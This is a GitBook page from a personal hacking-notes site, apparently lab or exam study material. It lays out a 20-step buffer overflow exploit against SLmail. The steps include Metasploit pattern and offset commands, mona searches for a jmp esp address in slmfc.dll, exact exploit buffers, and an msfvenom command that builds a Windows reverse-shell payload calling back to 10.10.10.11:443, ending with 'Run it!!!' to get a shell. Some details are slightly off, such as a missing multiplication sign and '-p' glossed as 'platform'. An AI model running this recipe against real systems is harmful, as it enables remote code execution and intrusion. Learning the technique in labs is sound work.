Hack$Notes
Search…
Hack$Notes
Enumeration
Transferring Files
Metasploit Framework
Reverse Shells
Buffer Overflow
B.O Steps
SLmail B.O
Spawning a Shell
Password Attacks
Privilege Escalation
Port Forwarding
Tools / Techniques
Resources
Powered By
GitBook
B.O Steps
Steps used in buffer overflow.
1)
Use script to
crash
program and take a note the bytes needed for.
2)
Replicate
the crash with the bytes from 1) to see if indeed crashes the program.
3)
Generate
a pattern with length same as above.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
4)
Replace the pattern above in place of the bytes.
5)
Make a note of the HEX number that overwrites the EIP at the time of the crash.
6)
Together with the EIP found in 5) determine the offset.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q HEX
7)
The buffer should look like this
buffer = "A"*2606 + "B"*4 +"C"*90 = 2700
8)
Increase
buffer if the bytes are not enough for our shellcode.
buffer = "A"*2606 + "B"*4 +"C"*(3500-2606-4)
9)
Look for
bad characters
buffer = "A"*2606 + "B"*4 + badchars :where badchars=("\x00...\xff"
10)
The main idea is to
replace
the EIP with ESP but can be difficult to hand code ESP as its not constant.
11)
By the time of the crash there are other dll's and functions loaded. We need to find those (with no DEP and noASLR)
12)
Use mona
!mona modules
13)
Use nasm to make a note of the
jmp esp
ruby /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm> jmp esp
00000000 FFE4 jmp esp
nasm>
14)
Find the memory address
!mona find -s "\xff\xe4" -m slmfc.dll
15)
Memory address found in 14) above.
Remember
it should be in reverse if x86 arch
buffer = "A"*2606 + "\x8f\x35\x4a\x5f" +"C"*(3500-2606-4)
16)
Place a
breakpoint
at this address and let it run
17)
ESP will then be pointed to the next executable which will be our shellcode.
18)
Create a
shellcode
with
msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
​
where:
-p: platform
-f: format
-e: encoder
-b: bad characters
-a: arch
19)
Our buffer at this stage should be the following:
buffer = "A"*2606 + "\x8f\x35\x4a\x5f" +"\x90"16 + shellcode + "C"*(3500-2606-4-351-16)
20)
Run it!!!
We should have a
shell
.
Previous
Buffer Overflow
Next
SLmail B.O
Last modified
2yr ago
Copy link